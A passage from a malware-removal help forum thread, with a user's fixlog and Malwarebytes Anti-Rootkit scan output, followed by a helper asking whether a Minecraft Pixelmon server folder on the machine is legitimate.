2017-12-03 23:03 - 2017-12-04 00:10 - 000012288 ____A [4E76EE6AEF6A3F4FEC7856BEEBE04765] () C:\Antonio PIXELMON SV\world\region\r.-86.-16.mca
2017-12-03 23:14 - 2017-12-04 00:10 - 000012288 ____A [2F2C752753112AE1010C4F8D2D6B4611] () C:\Antonio PIXELMON SV\world\region\r.-86.-56.mca
2017-12-03 23:03 - 2017-12-04 00:10 - 000012288 ____A [7D283F02DA2996A7A3A21174F233D505] () C:\Antonio PIXELMON SV\world\region\r.-88.-13.mca
2017-12-03 23:04 - 2017-12-04 00:10 - 000012288 ____A [2B23B36D028B0B89C58F56AEC6BF9F43] () C:\Antonio PIXELMON SV\world\region\r.-88.-18.mca
2017-12-03 23:05 - 2017-12-04 00:10 - 000012288 ____A [EC9CC7C93EBB36B9D7A6E928DFF44085] () C:\Antonio PIXELMON SV\world\region\r.-90.-22.mca
2017-12-03 23:06 - 2017-12-04 00:10 - 000012288 ____A [40873E90CF3277E2F67C8580F4811698] () C:\Antonio PIXELMON SV\world\region\r.-90.-27.mca
2017-12-03 23:05 - 2017-12-04 00:10 - 000012288 ____A [7C7AE2210DBEA7C7FF191DAF33D62417] () C:\Antonio PIXELMON SV\world\region\r.-92.-21.mca
2017-12-03 23:06 - 2017-12-04 00:10 - 000012288 ____A [6EC38DA8944D1E8B87BBECE0A9A7B98E] () C:\Antonio PIXELMON SV\world\region\r.-94.-26.mca
2017-12-03 23:10 - 2017-12-04 00:10 - 000012288 ____A [5C9AB717DB253550A1CC8423D1034017] () C:\Antonio PIXELMON SV\world\region\r.-95.-40.mca
2017-12-03 23:06 - 2017-12-04 00:10 - 000012288 ____A [DDE5F558879189CCDC575E66DDE3B1C7] () C:\Antonio PIXELMON SV\world\region\r.-97.-28.mca
2017-12-03 21:18 - 2017-12-03 21:18 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\world\stats
2017-12-03 21:18 - 2017-12-04 21:45 - 000006323 ____A [29722EF02A4B5A6E7ECECE253C848F7A] () C:\Antonio PIXELMON SV\world\stats\05c85692-a179-3bf3-85d4-007ba4bd7d78.json
2017-12-03 21:18 - 2017-12-04 22:27 - 000006817 ____A [48D39EC629ABE3E8DBBDF49662FE64F1] () C:\Antonio PIXELMON SV\world\stats\f2db959e-ff49-31b9-86c4-b4d0a96b38dd.json
 
====== End of Folder: ======
 
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21931282 B
Java, Flash, Steam htmlcache => 363837950 B
Windows/system/drivers => 5143862 B
Edge => 0 B
Chrome => 790746688 B
Firefox => 16297903 B
Opera => 36254673 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 2844192 B
NetworkService => 0 B
Sblck => 462536812 B
 
RecycleBin => 1225 B
EmptyTemp: => 1.6 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 02:41:19 ====


#14 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 10:23 PM

The malwarebytes log :

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.10.3.1001
 
© Malwarebytes Corporation 2011-2012
 
OS version: 6.1.7601 Windows 7 Service Pack 1 x64
 
Account is Administrative
 
Internet Explorer version: 11.0.9600.18762
 
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
CPU speed: 3.400000 GHz
Memory total: 25735348224, free: 21380354048
 
Downloaded database version: v2017.12.29.01
Downloaded database version: v2017.11.28.01
=======================================
Initializing...
Driver version: 4.3.0.15
------------ Kernel report ------------
     12/29/2017 03:07:21
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\CLFS.SYS
\SystemRoot\system32\CI.dll
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\system32\drivers\ACPI.sys
\SystemRoot\system32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\msisadrv.sys
\SystemRoot\system32\drivers\pci.sys
\SystemRoot\system32\drivers\vdrvroot.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\system32\drivers\compbatt.sys
\SystemRoot\system32\drivers\BATTC.SYS
\SystemRoot\system32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\system32\drivers\pciide.sys
\SystemRoot\system32\drivers\PCIIDEX.SYS
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\system32\DRIVERS\iaStor.sys
\SystemRoot\system32\drivers\atapi.sys
\SystemRoot\system32\drivers\ataport.SYS
\SystemRoot\system32\drivers\msahci.sys
\SystemRoot\system32\drivers\amdxata.sys
\SystemRoot\system32\drivers\fltmgr.sys
\SystemRoot\system32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Ntfs.sys
\SystemRoot\System32\Drivers\msrpc.sys
\SystemRoot\System32\Drivers\ksecdd.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\system32\drivers\vmstorfl.sys
\SystemRoot\system32\drivers\volsnap.sys
\SystemRoot\System32\Drivers\spldr.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\hwpolicy.sys
\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\system32\drivers\disk.sys
\SystemRoot\system32\drivers\CLASSPNP.SYS
\SystemRoot\system32\DRIVERS\eamonm.sys
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\ehdrv.sys
\??\C:\Program Files\ESET\ESET NOD32 Antivirus\Modules\em000k_64\1012\em000k_64.dll
\??\C:\Program Files\ESET\ESET NOD32 Antivirus\Modules\em006_64\1169\em006_64.dll
\??\C:\Program Files\ESET\ESET NOD32 Antivirus\Modules\em018k_64\1515\em018k_64.dll
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\drivers\VIDEOPRT.SYS
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\system32\drivers\rdpencdd.sys
\SystemRoot\system32\drivers\rdprefmp.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\epfwwfpr.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\ws2ifsl.sys
\SystemRoot\system32\DRIVERS\wfplwf.sys
\SystemRoot\system32\DRIVERS\pacer.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\serial.sys
\??\C:\Windows\System32\drivers\zamguard64.sys
\??\C:\Windows\System32\drivers\zam64.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS
\SystemRoot\System32\drivers\discache.sys
\SystemRoot\system32\drivers\csc.sys
\SystemRoot\System32\Drivers\dfsc.sys
\SystemRoot\system32\DRIVERS\blbdrive.sys
\SystemRoot\SysWow64\drivers\AsUpIO.sys
\SystemRoot\SysWow64\drivers\AsIO.sys
\SystemRoot\system32\DRIVERS\tunnel.sys
\SystemRoot\system32\DRIVERS\nvlddmkm.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\dxgmms1.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\HECIx64.sys
\SystemRoot\system32\DRIVERS\e1c62x64.sys
\SystemRoot\system32\drivers\usbehci.sys
\SystemRoot\system32\drivers\USBPORT.SYS
\SystemRoot\system32\DRIVERS\nusb3xhc.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\system32\DRIVERS\1394ohci.sys
\SystemRoot\system32\DRIVERS\serenum.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\intelppm.sys
\SystemRoot\system32\DRIVERS\CompositeBus.sys
\SystemRoot\system32\DRIVERS\vcsvad.sys
\SystemRoot\system32\DRIVERS\portcls.sys
\SystemRoot\system32\DRIVERS\drmk.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\system32\drivers\ScreamingBAudio64.sys
\SystemRoot\system32\DRIVERS\AgileVpn.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\rassstp.sys
\SystemRoot\system32\DRIVERS\tap0901t.sys
\SystemRoot\system32\DRIVERS\rdpbus.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\serscan.sys
\SystemRoot\system32\DRIVERS\dtlitescsibus.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\ScpVBus.sys
\SystemRoot\system32\DRIVERS\umbus.sys
\SystemRoot\system32\DRIVERS\dtliteusbbus.sys
\SystemRoot\system32\DRIVERS\vodafone_K3805-z_dc_enum.sys
\SystemRoot\system32\drivers\usbhub.sys
\SystemRoot\system32\DRIVERS\nusb3hub.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\drivers\nvhda64v.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\Drivers\dump_iaStor.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\system32\DRIVERS\monitor.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\System32\cdd.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\DRIVERS\lltdio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\DRIVERS\rspndr.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\system32\drivers\peauth.sys
\??\C:\Windows\SysWOW64\speedfan.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\System32\DRIVERS\srv.sys
\??\C:\Users\Sblck\AppData\Local\Temp\ALSysIO64.sys
\??\C:\Program Files (x86)\MSI Afterburner\RTCore64.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\??\C:\Windows\system32\drivers\3BF645C6.sys
\Windows\System32\ntdll.dll
\Windows\System32\smss.exe
\Windows\System32\apisetschema.dll
\Windows\System32\autochk.exe
\Windows\System32\rpcrt4.dll
\Windows\System32\Wldap32.dll
\Windows\System32\normaliz.dll
\Windows\System32\sechost.dll
\Windows\System32\msctf.dll
\Windows\System32\imagehlp.dll
\Windows\System32\msvcrt.dll
\Windows\System32\ole32.dll
\Windows\System32\kernel32.dll
\Windows\System32\wininet.dll
\Windows\System32\clbcatq.dll
\Windows\System32\shell32.dll
\Windows\System32\difxapi.dll
\Windows\System32\imm32.dll
\Windows\System32\comdlg32.dll
\Windows\System32\urlmon.dll
\Windows\System32\iertutil.dll
\Windows\System32\shlwapi.dll
\Windows\System32\advapi32.dll
\Windows\System32\usp10.dll
\Windows\System32\oleaut32.dll
\Windows\System32\ws2_32.dll
\Windows\System32\gdi32.dll
\Windows\System32\setupapi.dll
\Windows\System32\lpk.dll
\Windows\System32\nsi.dll
\Windows\System32\psapi.dll
\Windows\System32\user32.dll
\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
\Windows\System32\KernelBase.dll
\Windows\System32\crypt32.dll
\Windows\System32\cfgmgr32.dll
\Windows\System32\wintrust.dll
\Windows\System32\devobj.dll
\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll
\Windows\System32\userenv.dll
\Windows\System32\comctl32.dll
\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll
\Windows\System32\profapi.dll
\Windows\System32\msasn1.dll
\Windows\SysWOW64\normaliz.dll
----------- End -----------
Done!
 
Scan started
Database versions:
  main:    v2017.12.29.01
  rootkit: v2017.10.14.01
 
<<<2>>>
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xfffffa801317c790, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa801317c2c0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa801317c790, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8012c28a90, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa8012c2b050, DeviceName: \Device\Ide\IAAStorageDevice-1\, DriverName: \Driver\iaStor\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa8013176790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa801307e960, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8013176790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8012c28c90, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa8012c27050, DeviceName: \Device\Ide\IAAStorageDevice-0\, DriverName: \Driver\iaStor\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 9E858FBD
 
Partition information:
 
    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 3907024896
    Partition is not bootable
    Partition file system is NTFS
 
    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
Disk Size: 2000398934016 bytes
Sector size: 512 bytes
 
Done!
Drive 1
This is a System drive
Scanning MBR on drive 1...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 991D8B9F
 
Partition information:
 
    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 1024000
    Partition is bootable
    Partition file system is NTFS
 
    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1026048  Numsec = 487368704
    Partition is not bootable
    Partition file system is NTFS
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
Disk Size: 250059350016 bytes
Sector size: 512 bytes
 
Done!
Physical Sector Size: 512
Drive: 2, DevicePointer: 0xfffffa80131a1060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa80131a1b90, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa80131a1060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8012c28630, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa8012c2f050, DeviceName: \Device\Ide\IAAStorageDevice-2\, DriverName: \Driver\iaStor\
------------ End ----------
Alternate DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 2
Scanning MBR on drive 2...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 6D231126
 
Partition information:
 
    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 976766976
    Partition is not bootable
    Partition file system is NTFS
 
    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable
 
Disk Size: 500107862016 bytes
Sector size: 512 bytes
 
Done!
<<<2>>>
<<<3>>>
Volume: F:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-5499475D3206BFC770FFF19A8E3E11BDC70A2B3D.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-5499475D3206BFC770FFF19A8E3E11BDC70A2B3D.bin.7C" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-5499475D3206BFC770FFF19A8E3E11BDC70A2B3D.bin.83" is compressed (flags = 1)
Scan finished
=======================================
 
 
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-1-1026048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-2-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
Removal finished


#15 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,416 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:06 PM

Posted 29 December 2017 - 09:27 AM

Greetings.

Thank you for the reports.

The contents of the C:\Antonio PIXELMON SV appear to me they may be legitimate. Do you recognize that information?

Please update me on the state of your computer.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users